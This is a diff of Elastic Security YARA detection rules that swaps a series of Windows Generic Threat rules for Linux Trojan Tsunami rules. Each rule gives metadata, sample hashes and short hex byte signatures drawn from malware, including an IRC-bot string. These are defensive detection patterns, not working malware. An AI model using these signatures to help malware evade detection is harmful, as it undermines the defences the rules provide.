ELASTIC_Windows_Generic_Threat_C54Ed0Ed : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_6B3974B2 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "c54ed0ed-9c63-437c-a016-d960bbb83c40" - date = "2024-01-21" - modified = "2024-02-08" + id = "6b3974b2-fd7f-4ebf-8aba-217761e7b846" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1730-L1747" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "f0f4878cb003371522ed1419984f15fd5049f1adeb8e051b8b51b31b0d620e96" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L281-L299" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2216776ba5c6495d86a13f6a3ce61b655b72a328ca05b3678d1abb7a20829d04" + logic_hash = "7c44a0abcd51a6b775fc379b592652ebb10faf16c039ca23b20984183340cada" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e08706e235d6cf23d9c772e1b67463b3e6261a5155d88762472d892079df0d4" + fingerprint = "942a35f7acacf1d07577fe159a34dc7b04e5d07ff32ea13be975cfeea23e34be" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 81 FA 00 10 00 00 72 1C 48 83 C2 27 4C 8B 41 F8 49 2B C8 48 8D 41 F8 48 83 F8 1F 0F 87 92 00 00 00 49 8B C8 ?? ?? ?? ?? ?? 48 83 63 10 00 33 C0 EB 58 4D 8B CC 4D 8B C7 49 8B D6 48 8B CE FF D0 } + $a = { F4 89 45 EC 8B 45 EC C9 C3 55 89 E5 57 83 EC 0C EB 1F 8B 45 08 B9 FF FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Dbe41439 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_87Bcb848 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "dbe41439-982d-4897-9007-9ad0f206dc75" - date = "2024-01-21" - modified = "2024-02-08" + id = "87bcb848-cd8b-478c-87de-5df8c457024c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1749-L1767" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "64afd2bc6cec17402473a29b94325ae2e26989caf5a8b916dc21952149d71b00" - logic_hash = "288cdc285d024f2b69847e0d49bd4dc1c86a2a6a24a7b4fb248071855ba39a38" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L301-L319" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "575b0dc887d132aa3983e5712b8f642b03762b0685fbd5a32c104bca72871857" + logic_hash = "60e8aa7e27ea0bec665075a373ce150c21af4cddfd511b7ec771293126f0006c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f7c94f5bc3897c4741899e4f6d2731cd07f61e593500efdd33b5d84693465dd3" - severity = 50 + fingerprint = "ffd1a95ba4801bb51ce9b688bdb9787d4a8e3bc3a60ad0f52073f5c531bc6df7" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 E4 F8 83 EC 2C 53 56 8B F1 57 89 74 24 10 8B 46 1C 8B 08 85 C9 74 23 8B 56 2C 8B 3A 8D 04 0F 3B C8 73 17 8D 47 FF 89 02 8B 4E 1C 8B 11 8D 42 01 89 01 0F B6 02 E9 F1 00 00 00 33 DB } + $a = { 65 6D 6F 74 65 00 52 65 6D 6F 74 65 20 49 52 43 20 42 6F 74 00 23 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_51A52B44 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_Ad60D7E8 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "51a52b44-025b-4068-89eb-01cdf66efb4e" - date = "2024-01-21" - modified = "2024-02-08" + id = "ad60d7e8-0823-4bfa-b823-681c554bf297" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1769-L1787" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "303aafcc660baa803344bed6a3a7a5b150668f88a222c28182db588fc1e744e0" - logic_hash = "aad1c350f43cf2e0512e085e1a04db6099c568e375423afb9518b1fb89801c21" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L321-L338" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1253a8cd1a5230f1ec1f8c7ecd07f89f28acf5c2aa92395c6cb9e635c16a1e25" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "b10f3a3ceab827482139a9cadbd4507767e4d941191a7f19af517575435a5f70" - severity = 50 + fingerprint = "e1ca4c566307238a5d8cd16db8d0d528626e0b92379177b167ce25b4c88d10ce" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 40 6A 67 72 72 6C 6E 68 6D 67 65 77 77 68 74 69 63 6F 74 6D 6C 77 6E 74 6A 6A 71 68 72 68 62 74 75 64 72 78 7A 63 72 67 65 78 65 70 71 73 7A 73 75 78 6B 68 6E 79 63 74 72 63 63 7A 6D 63 63 69 63 61 61 68 70 66 } + $a = { 4E 4F 54 49 43 45 20 25 73 20 3A 53 70 6F 6F 66 73 3A 20 25 64 2E 25 64 2E 25 64 2E 25 64 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_5C18A7F9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_22646C0D : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "5c18a7f9-01af-468b-9a63-cfecbeb739d7" - date = "2024-01-21" - modified = "2024-02-08" + id = "22646c0d-785c-4cf2-b8c8-289189ae14d0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1789-L1807" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fd272678098eae8f5ec8428cf25d2f1d8b65566c59e363d42c7ce9ffab90faaa" - logic_hash = "05cea396567ed3e23907dec4e6e3a6629cd1044d9123cde0575a04b73bae6c20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L340-L358" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "20439a8fc21a94c194888725fbbb7a7fbeef5faf4b0f704559d89f1cd2e57d9d" + logic_hash = "548f531429132392f6d9bccff706b56ba87d8e44763116dedca5d0baa5097b92" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "68c9114ac342d527cf6f0cea96b63dfeb8e5d80060572fad2bbc7d287c752d4a" - severity = 50 + fingerprint = "0b1dce4e74536d4d06430aefd0127c740574dcc9a0e5ada42f3d51d97437720f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 5D E9 CD 1A 00 00 8B FF 55 8B EC 51 FF 75 08 C7 45 FC 00 00 00 00 8B 45 FC E8 03 1B 00 00 59 C9 C3 8B FF 55 8B EC 51 56 57 E8 6B 18 00 00 8B F0 85 F6 74 1C 8B 16 8B CA 8D 82 90 00 00 } + $a = { CB 01 00 00 55 53 51 52 48 01 FE 56 48 89 FE 48 89 D7 31 DB } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Ab01Ba9E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_019F0E75 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "ab01ba9e-01e6-405b-8aaf-ae06a8fe2454" - date = "2024-01-21" - modified = "2024-02-08" + id = "019f0e75-a766-4778-8337-c5bce478ecd9" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1809-L1829" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2b237716d0c0c9877f54b3fa03823068728dfe0710c5b05e9808eab365a1408e" - logic_hash = "cc8d79950e21270938d2ea7e501c7c8fdbebe92767b48b46bb03c08c377e095b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L360-L378" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "575b0dc887d132aa3983e5712b8f642b03762b0685fbd5a32c104bca72871857" + logic_hash = "7a63eb94266b04a31ba67165c512e2e060c3e344665aeed748a51943143b2219" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "dd9feb5d5756b3d3551ae21982b5e6eb189576298697b7d7d4bd042e4fc4c74f" - severity = 50 + fingerprint = "3b66dcdd89ce564cf81689ace33ee91682972421a9926efa1985118cefebdddc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 53 3C 3B 54 24 38 74 23 45 3B 6C 24 2C } - $a2 = { 3A 3D 3B 47 3B 55 3B 63 3B 6A 3B 7A 3B } - $a3 = { 56 30 61 30 6B 30 77 30 7C 30 24 39 32 39 37 39 41 39 4F 39 5D 39 64 39 75 39 } + $a = { 2E 0A 00 2B 73 74 64 00 2B 73 74 6F 70 00 2B 75 6E 6B 6E 6F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_917D7645 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_7C545Abf : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "917d7645-f13e-4d66-ab9e-447a19923ab7" - date = "2024-01-21" - modified = "2024-02-08" + id = "7c545abf-822d-44bb-8ac9-1b7e4f27698d" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1831-L1849" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "19b54a20cfa74cbb0f4724155244b52ca854054a205be6d148f826fa008d6c55" - logic_hash = "65748ff2e4448f305b9541ea9864cc6bda054d37be5ed34110a2f64c8fef30c7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L380-L398" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "95691c7ad1d80f7f1b5541e1d1a1dbeba30a26702a4080d256f14edb75851c5d" + logic_hash = "fa50ccc4c85417d18a84b7f117f853609c44b17c488a937cdc7495e2d32757f7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "557b459c07dc7d7e32cac389673d5ab487d1730de20a9ec74ae9432325d40cd2" - severity = 50 + fingerprint = "4141069d6c41c0c26b53a8a86fd675f09982ca6e99757a04ef95b9ad0b8efefa" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 E4 E0 56 57 53 81 EC D4 0A 00 00 8B D9 8B F2 BA 1D 00 00 00 FF 73 1C 8D 8C 24 BC 0A 00 00 E8 19 A1 02 00 6A 00 FF B4 24 BC 0A 00 00 8D 8C 24 A8 0A 00 00 E8 D4 06 03 00 8D 8C 24 B8 } + $a = { 03 FC DF 40 9C B8 20 07 09 20 35 15 11 03 20 85 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_7A09E97D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_32C0B950 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "7a09e97d-ccab-48d7-80d3-d76253a4d7e2" - date = "2024-01-21" - modified = "2024-02-08" + id = "32c0b950-0636-42bb-bc67-1b727985625f" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1851-L1869" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0c1e333e60547a90ec9d9dac3fc6698b088769bc0f5ec25883b2c4d1fd680a9" - logic_hash = "b65b2d12901953c137687a7b466c78e0537a2830c37a4cb13dd0eda457bba937" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L400-L418" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "214c1caf20ceae579476d3bf97f489484df4c5f1c0c44d37ff9b9066072cd83c" + logic_hash = "db077e5916327ca78fcc9dc35f64e5c497dbbe60c4a0c1eb7abb49c555765681" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3302bbee32c9968d3131277f4256c5673bec6cc64c1d820a32e66a7313387415" - severity = 50 + fingerprint = "e438287517c3492fa87115a3aa5402fd05f9745b7aed8e251fb3ed9d653984bb" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 06 2A 3A FE 09 00 00 FE 09 01 00 6F 8D 00 00 0A 2A 00 4A FE 09 00 00 FE 09 01 00 FE 09 02 00 6F 8E 00 00 0A 2A 00 1E 00 28 43 00 00 06 2A 5A FE 09 00 00 FE 09 01 00 FE 09 02 00 FE 09 } + $a = { 05 20 BC F8 41 B8 20 07 09 20 35 15 11 03 20 85 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Dc4Ede3B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_Cbf50D9C : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "dc4ede3b-d0c7-4993-8629-88753d65a7ad" - date = "2024-01-21" - modified = "2024-02-08" + id = "cbf50d9c-2893-48c9-a2a9-45053f0a174b" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1871-L1889" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c49f20c5b42c6d813e6364b1fcb68c1b63a2f7def85a3ddfc4e664c4e90f8798" - logic_hash = "c402d5f16f2be32912d7a054b51ab6dafc6173bb5a267a7846b3ac9df1c4c19f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L420-L438" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b64d0cf4fc4149aa4f63900e61b6739e154d328ea1eb31f4c231016679fc4aa5" + logic_hash = "331a35fb3ecc54022b1d4d05bd64e7c5c6a7997b06dbea3a36c33ccc0a2f7086" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8be5afdf2a5fe5cb1d4b50d10e8e2e8e588a72d6c644aa1013dd293c484da33b" - severity = 50 + fingerprint = "acb32177d07df40112d99ed0a2b7ed01fbca63df1f63387cf939caa4cf1cf83b" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 89 E5 83 EC 28 C7 45 FC 00 00 00 00 C7 44 24 18 00 00 00 00 C7 44 24 14 00 00 00 00 C7 44 24 10 03 00 00 00 C7 44 24 0C 00 00 00 00 C7 44 24 08 00 00 00 00 C7 44 24 04 00 00 00 80 8B 45 08 } + $a = { 07 F8 BF 81 9C B8 20 07 09 20 35 15 11 03 20 85 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Bb480769 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_40C25A06 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "bb480769-57fb-4c93-8330-450f563fd4c6" - date = "2024-01-21" - modified = "2024-02-08" + id = "40c25a06-5f3c-42c1-9a8c-5c4a1568ff9a" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1891-L1909" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "010e3aeb26533d418bb7d2fdcfb5ec21b36603b6abb63511be25a37f99635bce" - logic_hash = "1087e0befceac2606ce5dc5f2b42b45ebad888e7d3e451c3fb89de7e932a31f5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L440-L458" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "61af6bb7be25465e7d469953763be5671f33c197d4b005e4a78227da11ae91e9" + logic_hash = "38976911ff9e56fae27fad8b9df01063ed703f43c8220b1fbcef7a3945b3f1ad" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9c58c2e028f99737574d49e47feb829058f6082414b58d6c9e569a50904591e7" - severity = 50 + fingerprint = "b45d666e2e7d571e95806a1a2c8e01cd5cd0d71160cbb06b268110d459ee252d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 89 E5 C6 45 03 B8 C7 45 08 BA EF BE AD C7 45 0C DE 89 10 BA C7 45 10 EF BE AD DE C7 45 14 89 50 04 B8 C7 45 18 EF BE AD DE C7 45 1C 6A 00 6A 01 C7 45 20 6A 00 FF D0 C7 45 24 B8 EF BE AD C7 } + $a = { 20 74 13 9C B8 20 07 09 20 35 15 11 03 20 85 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_5Fbf5680 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_35806Adc : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "5fbf5680-05c3-4a77-95d7-fa3cae7b4dbe" - date = "2024-01-21" - modified = "2024-02-08" + id = "35806adc-9bac-4481-80c8-a673730d5179" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1911-L1929" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1b0553a9873d4cda213f5464b5e98904163e347a49282db679394f70d4571e77" - logic_hash = "ec5399f6fb29125cb4c096851b9194fa35fb1e5ddd1f4d4f07b155471ae5c619" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L460-L478" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b" + logic_hash = "6e9d3e5c0a33208d1b5f4f84f8634955e70bd63395b367cd1ece67798ce5e502" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7cbd8d973f31505e078781bed8067ae8dce72db076c670817e1a77e48dc790fe" - severity = 50 + fingerprint = "f0b4686087ddda1070b62ade7ad7eb69d712e15f5645aaba24c0f5b124a283ac" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 3C 56 57 8B 45 08 50 E8 51 AF 00 00 83 C4 04 89 45 FC 8B 45 FC 83 C0 58 99 8B C8 8B F2 8B 45 08 99 2B C8 1B F2 89 4D F8 66 0F 57 C0 66 0F 13 45 EC C7 45 DC FF FF FF FF C7 45 E0 } + $a = { 85 3C 93 48 1F 03 36 84 C0 4B 28 7F 18 86 13 08 10 1F EC B0 73 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Aa30A738 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_D74D7F0C : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "aa30a738-616b-408c-960f-c0ea897145d0" - date = "2024-01-21" - modified = "2024-02-08" + id = "d74d7f0c-70f8-4dd7-aaf4-fd5ab94bb8b2" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1931-L1949" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7726a691bd6c1ee51a9682e0087403a2c5a798ad172c1402acf2209c34092d18" - logic_hash = "64967fbc0e74435452752731a8b9385345cc771d27ee33cd018cccdeb26bb75e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L480-L498" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b0a8b2259c00d563aa387d7e1a1f1527405da19bf4741053f5822071699795e2" + logic_hash = "6f5313fc9e838bd06bd4e797ea7fb448073849dc714ecf18809f94900fa11ca2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d2a4e1d4451d28afcef981f689de3212ff5d9c4ee8840864656082ef272f7501" - severity = 50 + fingerprint = "0a175d0ff64186d35b64277381f47dfafe559a42a3296a162a951f1b2add1344" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 8B 55 0C 85 D2 75 04 33 C0 5D C3 8B 45 08 53 56 8B 75 10 83 FE 08 57 F7 D0 B9 FF 00 00 00 0F 8C D1 00 00 00 8B FE C1 EF 03 8B DF F7 DB 8D 34 DE 89 75 10 0F B6 1A 8B F0 23 F1 33 F3 8B } + $a = { 20 79 6F 2C 0A 59 6A 02 5B 6A 04 58 CD 80 B3 7F 6A 01 58 CD } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_9A8Dc290 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_71D31510 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "9a8dc290-d9ec-4d52-a4e8-db4ac6ceb164" - date = "2024-01-21" - modified = "2024-02-08" + id = "71d31510-cd2c-4b61-b2cf-975d5ed70c93" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1951-L1969" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d951562a841f3706005d7696052d45397e3b4296d4cd96bf187920175fbb1676" - logic_hash = "0097a13187b953ebe97809dda2be818cfcd94991c03e75f344e34a3d2c4fe902" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L500-L518" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "33dd6c0af99455a0ca3908c0117e16a513b39fabbf9c52ba24c7b09226ad8626" + logic_hash = "18bfe9347faf1811686a61e0ee0de5cef842beb25fb06793947309135c41de89" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e9f42a0fdd778b8619633cce87c9d6a3d26243702cdd8a56e524bf48cf759094" - severity = 50 + fingerprint = "6c9f3f31e9dcdcd4b414e79e06f0ae633e50ef3e19a437c1b964b40cc74a57cb" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 6F 01 00 06 FE 0E 0B 00 FE 0C 0B 00 FE 0C 09 00 6F 78 01 00 06 FE 0C 0B 00 FE 0C 08 00 28 F2 00 00 06 6F 74 01 00 06 FE 0C 0B 00 FE 0C 07 00 28 F2 00 00 06 6F 76 01 00 06 FE 0C 0B 00 FE 09 00 } + $a = { 5C B3 C0 19 17 5E 7B 8B 22 16 17 E0 DE 6E 21 46 FB DD 17 67 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Bbf2A354 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Tsunami_97288Af8 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)" author = "Elastic Security" - id = "bbf2a354-64e5-4115-aaf7-2705194445da" - date = "2024-01-22" - modified = "2024-02-08" + id = "97288af8-f447-48ba-9df3-4e90f1420249" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1971-L1989" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b4e6c748ad88070e39b53a9373946e9e404623326f710814bed439e5ea61fc3e" - logic_hash = "6be2fae41199daea6b9d0394c9af7713543333a50620ef417bb8439d5a07f336" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Tsunami.yar#L520-L538" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c39eb055c5f71ebfd6881ff04e876f49495c0be5560687586fc47bf5faee0c84" 